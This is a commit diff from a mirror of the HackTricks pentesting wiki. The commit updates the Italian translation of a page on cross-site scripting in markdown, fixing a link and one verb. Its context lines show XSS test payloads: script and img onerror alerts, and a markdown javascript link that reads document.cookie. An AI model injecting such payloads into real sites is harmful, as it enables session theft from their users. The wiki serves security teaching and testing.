mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/pentesting-web/xss-cross-site-scripting/xss-in-markdown
This commit is contained in:
parent
b31d7a464e
commit
8a1fe2740c
@ -14,11 +14,11 @@ alert(1)
|
|||||||
</script>
|
</script>
|
||||||
<img src="x" onerror="alert(1)" />
|
<img src="x" onerror="alert(1)" />
|
||||||
```
|
```
|
||||||
Puoi trovare ulteriori esempi nella [pagina principale XSS di hacktricks]().
|
Puoi trovare ulteriori esempi nella [pagina principale XSS di hacktricks](README.md).
|
||||||
|
|
||||||
### Link Javascript
|
### Link Javascript
|
||||||
|
|
||||||
Se i tag HTML non sono un'opzione, potresti sempre provare a giocare con la sintassi markdown:
|
Se i tag HTML non sono un'opzione, puoi sempre provare a giocare con la sintassi markdown:
|
||||||
```html
|
```html
|
||||||
<!-- markdow link to XSS, this usually always work but it requires interaction -->
|
<!-- markdow link to XSS, this usually always work but it requires interaction -->
|
||||||
[a](javascript:prompt(document.cookie))
|
[a](javascript:prompt(document.cookie))
|
||||||
|
Loading…
x
Reference in New Issue
Block a user